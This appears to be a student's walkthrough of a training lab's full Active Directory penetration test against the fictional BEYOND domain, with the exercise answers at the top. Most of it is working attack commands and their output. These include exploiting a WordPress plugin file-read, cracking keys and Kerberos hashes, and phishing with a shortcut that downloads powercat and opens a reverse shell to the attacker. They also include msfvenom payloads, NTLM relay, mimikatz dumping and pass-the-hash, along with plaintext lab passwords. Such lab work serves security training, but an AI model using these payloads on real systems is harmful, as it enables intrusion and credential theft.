Topics: Assembling the Pieces
# Questions 1
Start the VM group to follow along the guided penetration test throughout the Module. Once you have access to the domain controller, retrieve the NTLM hash of the domain administrator account BEYOND\Administrator and enter it as answer to this exercise.
# Answer
8480fa6ca85394df498139fe5ca02b95

# Questions 2
In a real assessment, we'd now create a penetration testing report for our client to inform them about our findings. Attached is an example report for the penetration test of BEYOND Finances. Read the report, find the flag at the end of the document, and enter it as answer to this exercise.
# Answer
Report_Writing_Is_Fun

172.16.155.240 VM #1 OS 
172.16.155.243 VM #4 OS
172.16.155.241 VM #2 OS
192.168.199.242 VM #3 - MAILSRV1 
192.168.199.244 VM #5 - WEBSRV1
192.168.199.250 VM #6 - WINPREP OS (offsec:lab)

# MAILSRV1
sudo nmap -sC -sV -T4 -vvv 192.168.199.242 
...
25/tcp  open  smtp          syn-ack ttl 125 hMailServer smtpd
80/tcp  open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
110/tcp open  pop3          syn-ack ttl 125 hMailServer pop3d
135/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open  imap          syn-ack ttl 125 hMailServer imapd
445/tcp open  microsoft-ds? syn-ack ttl 125
587/tcp open  smtp          syn-ack ttl 125 hMailServer smtpd
...

# WEBSRV1
sudo nmap -sC -sV -T4 -vvv 192.168.199.244
...
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.52 ((Ubuntu))
...

# hMailServer is discovered, lets check on the directory and subdomain buster

# MAILSRV1
gobuster dir -u http://192.168.199.242 -w=/home/kali/Tools/dict/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt 
# No results come back

# WEBSRV1
gobuster dir -u http://192.168.199.244 -w /home/kali/Tools/dict/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt
...
/admin                (Status: 302) [Size: 0] [--> http://192.168.199.244/wp-admin/]
...

# Checked both server  Apache 2.4.52 version which we have no any actionable exploit. As well as OpenSSH 8.9p1 Ubuntu3. We'll skip it now 


# Checked the webpage it is Wordpress. 
whatweb http://192.168.199.244
...
http://192.168.199.244/main/ [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[192.168.199.244], JQuery[3.6.0], MetaGenerator[WordPress 6.0.2], Script, Title[BEYOND Finances &#8211; We provide financial freedom], UncommonHeaders[link], WordPress[6.0.2]
...

# We can use WPscan to lookthrough any vulnerablity exist on the WEBSERV
wpscan --url http://192.168.199.244 -e vp --api-token

wpscan --url http://192.168.199.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
...
akismet
 | Latest Version: 5.3.2
 | The version could not be determined.
contact-form-7
The version is out of date, the latest version is 5.9.5
| Version: 5.6.3 (90% confidence)
 | [!] Title: Contact Form 7 < 5.8.4 - Authenticated (Editor+) Arbitrary File Upload
 |     Fixed in: 5.8.4
 |     References:
 |      - https://wpscan.com/vulnerability/70e21d9a-b1e6-4083-bcd3-7c1c13fd5382
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6449
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d7fb020-6acb-445e-a46b-bdb5aaf8f2b6
 |
 | [!] Title: Contact Form 7 < 5.9.2 - Reflected Cross-Site Scripting
 |     Fixed in: 5.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/1c070a2c-2ab0-43bf-b10b-6575709918bc
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2242
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5bf4972-424a-4470-a0bc-7dcc95378e0e
duplicator
The version is out of date, the latest version is 1.5.9
 Version: 1.3.26 (80% confidence)
elementor
The version is out of date, the latest version is 3.21.7
Version: 3.7.7 (100% confidence)
Title: Elementor Website Builder < 3.12.2 - Admin+ SQLi
 |     Fixed in: 3.12.2
 |     References:
 |      - https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0329
wordpress-seo
The version is out of date, the latest version is 22.7
 | Version: 19.7.1 (100% confidence)
...

# Found Contact Form vulnerability 
https://github.com/0dteam/CVE-2024-22024
# Attacker URL I Use webhook.site to capture
https://webhook.site/
python cve_2024_22024.py -u http://192.168.199.244 -c https://webhook.site/c4329d48-14b7-4b05-a3be-f4cb078b3913
...
Response from http://192.168.199.244: 404
...
# Lol...  404 

# Let check another vulnerable plugin
searchsploit duplicator
...
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read          | php/webapps/50420.py
...
searchsploit -m 50420 
python 50420.py http://192.168.199.244 /etc/passwd
...
root:x:0:0:root:/root:/bin/bash
offsec:x:1000:1000:offsec:/home/offsec:/bin/bash
daniela:x:1001:1001:,,,:/home/daniela:/bin/bash
marcus:x:1002:1002:,,,:/home/marcus:/bin/bash
...

# We can find its id_rsa file from those user
python 50420.py http://192.168.199.244 /home/daniela/.ssh/id_rsa
[id_rsa_daniela_webserv1]

# Lets SSH into the machine
ssh -i id_rsa_daniela daniela@192.168.199.244
Enter passphrase for key 'id_rsa_daniela': 

# Required for passphrase, we can try brute force
ssh2john id_rsa_daniela > ssh.hash 
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
...
tequieromucho    (id_rsa_daniela) 
...

# SSH into it again
ssh -i id_rsa_daniela daniela@192.168.199.244
Enter passphrase for key 'id_rsa_daniela': tequieromucho 

# User sudo permission status
daniela@websrv1:/home$ sudo -l
Matching Defaults entries for daniela on websrv1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User daniela may run the following commands on websrv1:
    (ALL) NOPASSWD: /usr/bin/git

# No password required to /usr/bin/git, we can use LOLBIN to find how to perform privilege escalation
https://www.hackingarticles.in/linux-for-pentester-git-privilege-escalation/
sudo git help config
# Inject "!/bin/sh" 
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
...
changed  checker.py  mysql.sh  snap
...
cat mysql.sh
...
mysql --user="root" --password="DanielKeyboard3311" --database="wordpress" --execute="update wp_options set option_value='http://$1' where option_name = 'siteurl';"
mysql --user="root" --password="DanielKeyboard3311" --database="wordpress" --execute="update wp_options set option_value='http://$1/main' where option_name = 'home';"
...

# We further investigate into wordpress file in /srv/www/wordpress, where we can use Git to check more information
git status
git log
...
commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1 (HEAD, master)
Author: root <root@websrv1>
Date:   Tue Sep 27 14:26:15 2022 +0000

    Removed staging script and internal network access

commit f82147bb0877fa6b5d8e80cf33da7b8f757d11dd
Author: root <root@websrv1>
Date:   Tue Sep 27 14:24:28 2022 +0000

    initial commit
...

git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
...
commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1 (HEAD, master)
    Removed staging script and internal network access
diff --git a/fetch_current.sh b/fetch_current.sh
deleted file mode 100644
index 25667c7..0000000
--- a/fetch_current.sh
+++ /dev/null
@@ -1,6 +0,0 @@
-#!/bin/bash
-
-# Script to obtain the current state of the web app from the staging server
-
-sshpass -p "dqsTwTpZPn#nL" rsync john@192.168.50.245:/current_webapp/ /srv/www/wordpress/
...


# We can use some tools like Linpeas and run with root user
wget http://192.168.45.232/linpeas_linux_amd_64
./linpeas_linux_amd_64
...
/srv/www/wordpress/wp-config.php                                   
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'DanielKeyboard3311' );
define( 'DB_HOST', 'localhost' );
...

# Here we obtain 192.168.50.245 pass, and put it in the cred.txt. 
# Lets try crackmapexec smb to all the network
code username.txt
code password.txt
sudo crackmapexec smb 192.168.199.0-254 -u username.txt -p password.txt  --continue-on-success
...
SMB         192.168.199.242 445    MAILSRV1         [+] beyond.com\John:dqsTwTpZPn#nL 
...

smbclient -L //192.168.199.242 -U john -W beyond.com -password=dqsTwTpZPn#nL
...
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
...

# Only default shares, nothing to dig more.
# Lets try rdp and SSH. where both also showing failed.

# We can try with the phishing email payload and hope that user will press for it.
wsgidav -H=0.0.0.0 -p=80 --auth=anonymous -r /home/kali/Desktop/beyond/webdav

# Access to the WINPREP OS
xfreerdp /cert-ignore /v:192.168.184.250 /u:offsec /p:lab /d:beyond.com +home-drive

# Open VSCode and create a new text file named config.Library-ms
[config.Library-ms]

# Save the file and transfer back to Kali\Desktop\Beyond folder.

# Next we can create the shortcut file on WINPREP and instruct the victim machine download powercat and create the reverse shell
'''
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:8080/Reverse-Shell/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"
'''
# Transfer the [install.lnk] file to webdav folder

rlwrap nc -lvnp 4444

# While everything had prepared. Lets use the SMTP test tool swaks to create email. 
# As a first step, let's create the body of the email containing our pretext. Because we don't have specific information about any of the users, we have to use something more generic. Fortunately, we obtained some information about the target company on WEBSRV1 within the Git repository.

# We will convince marcus or daniela to open our attachment
mkdir phis-mail
code body.txt
[body.txt]

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.184.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john
Password: dqsTwTpZPn#nL
...
 -> RCPT TO:<marcus@beyond.com>
<-  250 OK
...
# http.server
...
192.168.184.242 - - [26/May/2024 01:02:02] "GET /Reverse-Shell/powercat.ps1 HTTP/1.1" 200 -
...

# Go to netcat listeners
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
beyond\marcus
PS C:\Windows\System32\WindowsPowerShell\v1.0> ipconfig
IPv4 Address. . . . . . . . . . . : 172.16.140.243
PS C:\> hostname
CLIENTWK1

# Now we landed on CLIENTWK1, lets check any privilge escalation methods
iwr -uri http://192.168.45.204:8080/Windows/winPEASx64.exe -Outfile winPEAS.exe
./winPEAS.exe
...
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22000 N/A Build 22000                  
System Type: x64-based PC
ProductName: Windows 10 Enterprise 
IsVirtualMachine: True
# PS history file: 
C:\Users\marcus\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Home folders found
C:\Users\marcus : marcus [AllAccess]
C:\Users\Public : Batch [WriteData/CreateFiles]
# Scheduled Applications --Non Microsoft--
(BEYOND\marcus) exec_lnk: powershell -ep bypass -File C:\Users\marcus\Documents\exec.ps1
    Permissions file: marcus [AllAccess]
    Permissions folder(DLL Hijacking): marcus [AllAccess]
Trigger: At 4:31 AM on 9/29/2022-After triggered, repeat every 00:01:00 indefinitely.
             At log on of BEYOND\marcus-After triggered, repeat every 00:01:00 indefinitely
# Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    marcus::BEYOND:1122334455667788:71f35ab5d694694cf27994135d8c2f67:010100000000000018d82d2744afda01b0f7bdcecd04e70e00000000080030003000000000000000000000000020000090ae7ac9fa91e6f2b96468b5d78263e57916648833ab7abdec44ec0560f1b4fa0a00100000000000000000000000000000000000090000000000000000000000 
# Looking for possible password files in users homes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml  C:\Users\marcus\AppData\Local\Packages\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\LocalState\EBWebView\ZxcvbnData\3.0.0.0\passwords.txt
C:\Users\marcus\AppData\Local\Packages\MicrosoftTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\ZxcvbnData\3.0.0.0\passwords.txt C:\Users\marcus\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt
# Found Misc-Simple Passwords Regexes
C:\Users\marcus\Documents\exec.ps1: password = "DefrostNewsySupply5544"
# Found Misc-Simple Passwords Regexes
C:\Users\marcus\Documents\exec.ps1: username = "marcus"
...

# Found new password and some interesting file to lookthrough
type Documents\exec.ps1
```
Clear-DnsClientCache
$server = "mailsrv1.beyond.com"
$port = 110
$enableSSL = $false
$username = "marcus"
$password = "DefrostNewsySupply5544"
$baseFolder = "C:\attachments"
```

# Lets build a stable connection with CLIENTWK1
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.45.204 LPORT=5555 -f exe -o cute.exe

msfconsole
use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
set LPORT 5555
run -j

PS C:\Users\marcus> wget http://192.168.45.204:8080/beyond/CLIENTWK1/cute.exe

# CMI... directly killed by Windows Defender..

# Since we haven't identified a privilege escalation vector via winPEAS and there is nothing else actionable on the system, such as a Password Manager, let's start enumerating the AD environment and its objects.


#  For this Module, we'll use BloodHound with the SharpHound.ps1 collector, which we discussed in the Active Directory Introduction and Enumeration Module.

PS C:\Users\marcus> iwr -uri http://192.168.45.204:8080/AD/SharpHound.ps1 -Outfile SharpHound.ps1

PS C:\Users\marcus> powershell -ep bypass
PS C:\Users\marcus> Import-Module .\SharpHound.ps1
# Add -v 0 for looping issue
PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\marcus -v 0 
PS C:\Users\marcus> ls
5/26/2024   2:08 AM          11860 20240526020850_BloodHound.zip

# Transfer to KALI Machine, we can use WebDAV
PS C:\Users\marcus> net use W: http://192.168.45.204/
PS C:\Users\marcus> dir W:
PS C:\Users\marcus> copy 20240526020850_BloodHound.zip W:

# Import to bloodhound to KALI
sudo neo4j start
bloodhound
Username: neo4j
Password: kali

# FROM GUI Clear Database
# Go to bottom of Database info and click "Clear Database"
# Go to Top Right hover bar click "Upload Data"

# Before we start, let's briefly review some of BloodHound's capabilities. As we have learned, BloodHound contains various pre-built queries such as Find all Domain Admins. These queries are built with the Cypher Query Language.1 In addition to the pre-built queries, BloodHound also allows us to enter custom queries via the Raw Query function at the bottom of the GUI.

# Since we are currently interested in basic domain enumeration, such as listing AD users and computers, we have to build and enter custom queries as the pre-built functions don't provide these capabilities.

# Let's build a raw query to display all computers identified by the collector. The query starts with the keyword MATCH, which is used to select a set of objects. Then, we set the variable m containing all objects in the database with the property Computer. Next, we use the RETURN keyword to build the resulting graph based on the objects in m.
MATCH (m:Computer) RETURN m

# From the output we can see there is 4 workstations in this domain. Lets update to Creds.txt. We can use nslookup to find their IP as well from CLIENTWK1

MATCH (m:User) RETURN m
...
DANIELA
MARCUS
KRBTGT
JOHN
BECCY
ADMINISTRATOR
GUEST
...

# We had already identidy john and marcus. Now we can update our username 

# We can try to find the all Domain Admins from Bloodhound Pre-Built Analytics Queries
...
BECCY and ADMINISTRATOR
...

# Lets try other 
Find Workstations where Domain Users can RDP
Find Servers where Domain Users can RDP
Find Computers where Domain Users are Local Admin
Shortest Path to Domain Admins from Owned Principals

# Unfortunately, none of these queries return any results. This means BloodHound didn't identify any workstations or servers where Domain Users can log in via RDP. In addition, no Domain Users are a local Administrator on any computer objects. Therefore, we don't have privileged access on any domain computers as john or marcus. Finally, there are no direct paths from owned users to the Domain Admins group that BloodHound could identify.

# BloodHound didn't provide us with actionable vectors, we have to resort to other methods. We could have also used PowerView or LDAP queries to obtain all of this information. However, in most penetration tests, we want to use BloodHound first as the output of the other methods can be quite overwhelming. It's an effective and powerful tool to gain a deeper understanding of the Active Directory environment in a short amount of time. We can also use raw or pre-built queries to identify highly complex attack vectors and display them in an interactive graphical view.

#  We'll further enumerate the target network to identify potential attack vectors. First, we'll review all active user sessions on machines. Then, we'll examine user accounts for the existence of SPNs.1 Finally, we'll leverage tools such as Nmap and CrackMapExec via a SOCKS52 proxy to identify accessible services.

# To review active sessions, we'll again use a custom query in BloodHound. Since Cypher is a querying language, we can build a relationship query with the following syntax (NODES)-[:RELATIONSHIP]->(NODES).3

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

# Interestingly, the previously identified domain administrator account beccy has an active session on MAILSRV1. If we manage to get privileged access to this machine, we can potentially extract the NTLM hash for this user.

# The user of the third active session is displayed as a SID. BloodHound uses this representation of a principal when the domain identifier of the SID is from a local machine. For this session, this means that the local Administrator (indicated by RID 500) has an active session on INTERNALSRV1.

# Our next step is to identify all kerberoastable users in the domain. To do so, we can use the List all Kerberoastable Accounts pre-built query in BloodHound.
...
KRBTGT and DANIELA both are kerberoastable
...

# The krbtgt user account acts as service account for the Key Distribution Center (KDC) and is responsible for encrypting and signing Kerberos tickets. When a domain is set up, a password is randomly generated for this user account, making a password attack unfeasible. Therefore, we can often safely skip krbtgt in the context of Kerberoasting.

# Lets examine the SPN for daniela in Bloodhound via the Node info menu by clicking on the node.

# Daniela
Service Principal Names	http/internalsrv1.beyond.com

# Based on this, we can assume that a web server is running on INTERNALSRV1. Once we've performed Kerberoasting and potentially obtained the plaintext password for daniela, we may use it to access INTERNALSRV1. However, as we have stated before, finding an actionable vector should not interrupt our enumeration process. We should collect all information, prioritize it, and then perform potential attacks. Therefore, let's set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec in order to identify accessible services, open ports, and SMB settings.

# Create the Meterpreter TCP
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.45.204 LPORT=443 -f exe -o cute.exe
# Listen to it
Msfconsole
use multi/handler
set payload windows/x64/meterpreter_reverse_tcp 
set LHOST tun0
set LPORT 443
set ExitOnSession false
run -j

# Upload the cute.exe to CLIENTWK1
PS C:\Users\marcus> iwr -uri http://192.168.45.204:8080/beyond/INTERNALSRV1/cute.exe -Outfile cute.exe
PS C:\Users\marcus> .\cute.exe

# Go back to the meterpreter, we can use multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy to access the internal network from our Kali box
msf6 > use multi/manage/autoroute
set session 1
run
...
[+] Route added to subnet 172.16.140.0/255.255.255.0 from host's routing table.
...
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j
...
[*] Auxiliary module running as background job 2.
[*] Starting the SOCKS proxy server
...

cat /etc/proxychains4.conf
...
socks5 127.0.0.1 1080
...

# Finally, we are set up to enumerate the network via Proxychains.
# Let's begin with CrackMapExec's SMB module to retrieve basic information of the identified servers (such as SMB settings). We'll also provide the credentials for john to list the SMB shares and their permissions with --shares. Because CrackMapExec doesn't have an option to specify an output file, we'll copy the results manually and store them in a file.

sudo proxychains -q crackmapexec smb 172.16.140.240-243 172.16.140.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares
...
SMB         172.16.140.243  445    CLIENTWK1        [*] Windows 11 Build 22000 x64 (name:CLIENTWK1) (domain:beyond.com) (signing:False) (SMBv1:False)
SMB         172.16.140.241  445    INTERNALSRV1     [*] Windows Server 2022 Build 20348 x64 (name:INTERNALSRV1) (domain:beyond.com) (signing:False) (SMBv1:False)
SMB         172.16.140.254  445    MAILSRV1         [*] Windows Server 2022 Build 20348 x64 (name:MAILSRV1) (domain:beyond.com) (signing:False) (SMBv1:False)
SMB         172.16.140.240  445    DCSRV1           [+] beyond.com\john:dqsTwTpZPn#nL 
SMB         172.16.140.243  445    CLIENTWK1        [+] beyond.com\john:dqsTwTpZPn#nL 
SMB         172.16.140.241  445    INTERNALSRV1     [+] beyond.com\john:dqsTwTpZPn#nL
SMB         172.16.140.240  445    DCSRV1           NETLOGON        READ            Logon server share 
SMB         172.16.140.240  445    DCSRV1           SYSVOL          READ            Logon server share 
SMB         172.16.140.254  445    MAILSRV1         [+] beyond.com\john:dqsTwTpZPn#nL
...

# john doesn't have actionable or interesting permissions on any of the discovered shares. As we already established via a pre-built BloodHound query and now through the scan, john as a normal domain user doesn't have local Administrator privileges on any of the machines in the domain.

# The output also states that MAILSRV1 and INTERNALSRV1 have SMB signing set to False. Without this security mechanism enabled, we can potentially perform relay attacks if we can force an authentication request.

# Next, let's use Nmap to perform a port scan on ports commonly used by web applications and FTP servers targeting MAILSRV1, DCSRV1, and INTERNALSRV1. We have to specify -sT to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.

sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 22,80,443 172.16.140.240 172.16.140.241 172.16.140.254
...
Nmap scan report for 172.16.140.241
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Nmap scan report for 172.16.140.254
22/tcp  closed ssh
80/tcp  open   http
443/tcp closed https
...

# Nmap identified the open ports 80 and 443 on 172.16.6.241 (INTERNALSRV1) and port 80 on 172.16.6.254 (MAILSRV1). While we could use the SOCKS5 proxy and proxychains to browse to the open port on 172.16.6.241, we'll use Chisel6 as it provides a more stable and interactive browser session. On our Kali machine, we'll use Chisel in server mode to receive incoming connections on port 8080. In addition, we'll add the --reverse option to allow reverse port forwarding.

# KALI
./chisel-linux64 server --reverse -p 8081 

# MSFCONSOLE
msf6 auxiliary(server/socks_proxy) > sessions -i 1
meterpreter > upload /home/kali/Desktop/Reverse-Shell/chisel-win64.exe
meterpreter > shell
# Port forward the INTERNALSRV1 port 80 to KALI Machine
C:\Users\marcus>.\chisel-win64.exe client 192.168.45.204:8081 R:80:172.16.140.241:80

# Closed the WebDAV and execute 
http://127.0.0.1/wordpress/
# When access from browser it redirect me to wordpress websites
# Lets try to access wp-admin, it shows site can't be reach due to DNS issue
sudo nano /etc/hosts
127.0.0.1 internalsrv1.beyond.com

# Lets access again wp-admin, and tried out all the username and password in creds, all shows failed.

# Based on the information from the previous Learning Unit, the web application on INTERNALSRV1 is the most promising target at the moment. Because it is a WordPress site, we could use WPScan again or use password attacks to successfully log in to WordPress's dashboard. Every time we obtain new information, we should reevaluate what we already know. For our situation, this means that we already obtained the information that daniela has an http SPN mapped to INTERNALSRV1. Our assumption at this point is that daniela may be able to log in to the WordPress login page successfully. Since daniela is kerberoastable, we can attempt to retrieve the user's password this way. If we can crack the TGS-REP1 password hash, we may be able to log in to WordPress and gain further access to INTERNALSRV1.

# If this attack vector fails, we can use WPScan and other web application enumeration tools to identify potential vulnerabilities on INTERNALSRV1 or switch targets to MAILSRV1.

# Let's perform Kerberoasting on Kali with impacket-GetUserSPNs over the SOCKS5 proxy using Proxychains. To obtain the TGS-REP hash for daniela, we have to provide the credentials of a domain user. Because we only have one valid set of credentials, we'll use john.

sudo proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.140.240 beyond.com/john
Password: dqsTwTpZPn#nL
# Paste it to daniela.hash

hashcat --help | grep -i "Kerberos"
...
 13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
...

hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force 
...
DANIelaRO123                                
Session..........: hashcat
Status...........: Cracked
...

# Now we obtain Daniela Password, update to creds.txt
# We can access to WordPress as well.
# While looking through the websites, we found out only Backup Migration plugin is enabled. 
# Click through the menus and setting, we discover the Backup directory path
"C:\xampp\htdocs\wordpress\wp-content\backup-migration-BV1emzfHrI"

# We may abuse this functionality to force an authentication of the underlying system.

# At the moment, there are two promising attack vectors.
1. The first is to upload a malicious WordPress plugin to INTERNALSRV1. By preparing and uploading a web shell or reverse shell, we may be able to obtain code execution on the underlying system.
2. Second attack vector is to review the BloodHound results again and make some assumptions. As we have discovered the local Administrator account has an active session on INTERNALSRV1. We can make the assumption that this user account is used to run the WordPress instance.

# It's not uncommon that the local Administrator accounts across computers in a domain are set up with the same password. Let's assume this is true for the target environment. Domain administrator beccy has an active session on MAILSRV1 and therefore, the credentials of the user may be cached on the system. Due to SMB signing being disabled on MAILSRV1 and INTERNALSRV1, a relay attack is possible if we can force an authentication.

# Finally, we identified the Backup directory path field in the WordPress Backup Migration plugin containing the path for the backup destination. This may allow us to force such an authentication request.

# Based on all of this information, let's define a plan for the second attack vector. First, we'll attempt to force an authentication request by abusing the Backup directory path of the Backup Migration WordPress plugin on INTERNALSRV1. By setting the destination path to our Kali machine, we can use impacket-ntlmrelayx2 to relay the incoming connection to MAILSRV1. If our assumptions are correct, the authentication request is made in the context of the local Administrator account on INTERNALSRV1, which has the same password as the local Administrator account on MAILSRV1.

# If this attack is successful, we'll obtain privileged code execution on MAILSRV1, which we can then leverage to extract the NTLM hash for beccy and therefore, meet one of the primary goals of the penetration test. Since the second attack vector not only results in code execution on a single system, but also provides a potential vector to achieve one of the goals of the penetration test, we'll perform the relay attack first.

# Let's set up impacket-ntlmrelayx before we modify the Backup directory path in the WordPress plugin. We'll use --no-http-server and -smb2support to disable the HTTP server and enable SMB2 support. 

# Create the Powershell one liner payload with
python pwsh-revshell-encode.py

sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.184.242 -c "powershell -nop -w hidden -e JABjAGwAaQB..."
...
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
...

rlwrap nc -lvnp 6677

# Now with everything set up, we can modify the Backup directory path. Let's set the path to the URI reference4 //192.168.45.204/test in which the IP is the address of our Kali machine and test is a nonexistent path.
# Use the command below on the Wordpress Backup directory path and press save
//192.168.45.204/test

# Go to the NTLMrelayx
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.184.242, attacking target smb://192.168.184.242
[*] Authenticating against smb://192.168.184.242 as INTERNALSRV1/ADMINISTRATOR SUCCEED
[*] Executed specified command on host: 192.168.184.242

# Go to the nc listener
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
MAILSRV1 

# Now we owned the authority system, next steps is to extract the password hash for the user BECCY. Lets establish a proper revershell shell using MSFCONSOLE
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.45.204 LPORT=6699 -f exe -o mailsrv1-shell.exe

PS C:\Users\Administrator> iwr -uri http://192.168.45.204:8080/beyond/MAILSRV1/mailsrv1-shell.exe -Outfile mailsrv1.exe
PS C:\Users\Administrator> ./mailsrv1.exe

# Go to MSFconsole 6699
msf6 exploit(multi/handler) > sessions 1
meterpreter > shell
C:\Users\Administrator>powershell

# We can use mimikatz.exe to get the NTLM hash

C:\Users\Administrator>net user beccy /domain


PS C:\Users\Administrator> iwr -uri http://192.168.45.204:8080/Windows/mimikatz.exe -Outfile mimi.exe
PS C:\Users\Administrator> .\mimi.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
...
        msv :
         [00000003] Primary
         * Username : beccy
         * Domain   : BEYOND
         * NTLM     : f0397ec5af49971f6efbdb07877046b3
        kerberos :
         * Username : beccy
         * Domain   : BEYOND.COM
         * Password : NiftyTopekaDevolve6655!#!
...

# We had obtained beccy NTLm and the Plain text passwords lets remote into DC
proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.140.240

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DCSRV1

iwr -uri http://192.168.45.204:8080/beyond/INTERNALSRV1/cute.exe -Outfile cute.exe
...
[*] Meterpreter session 3 opened (192.168.45.204:443 -> 192.168.184.242:64359) at 2024-05-26 08:13:12 -0700
...
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:8080/Windows/mimikatz.exe -Outfile mimikatz.exe
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz.exe # privilege::debug
mimikatz.exe # sekurlsa::logonPasswords
...
         [00000003] Primary
         * Username : Administrator
         * Domain   : BEYOND
         * NTLM     : 8480fa6ca85394df498139fe5ca02b95
...

# There we get the administrator passwords


# Reference
https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
